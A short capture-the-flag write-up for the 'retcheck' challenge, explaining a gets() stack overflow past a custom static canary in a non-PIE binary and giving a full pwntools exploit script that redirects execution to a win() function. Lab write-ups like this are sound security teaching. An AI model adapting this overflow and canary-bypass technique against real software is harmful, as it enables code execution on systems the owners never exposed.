retcheck

retcheck was a fairly simply buffer overflow challenge against a custom stack cookie implementation.

Files

The binary

the program simply allows the user to enter data that is, later on, copied with gets() into a 400 bytes long buffer.

"Canary" (kinda)

The program initializes a value used as a stack canary right below the buffer, so if we want to overwrite this functions return address, we will overwrite the canary and cause the program to abort. luckily enough, the binary has no pie.

So all we have to do is to overwrite the canary with it's own static value and continue exploitation.

Final Exploit

The program has a win() function that simply prints the flag, so overwriting the return address of the vuln() function is just enough.

#!/usr/bin/env python
from pwn import *

# Definitions
e = context.binary = ELF('./retcheck',checksec=False)

if args.REMOTE:
    io = remote('challenge.ctf.games',31463)
else:
    io = process(e.path)

# Exploit
overflow = 408*'A' 
overflow += p64(0x401465) # bypass canary
overflow += p64(0) # rbp
overflow += p64(0x4012e9) # return address

io.recvrepeat(0.1)
io.sendline(overflow)

io.interactive()

Last updated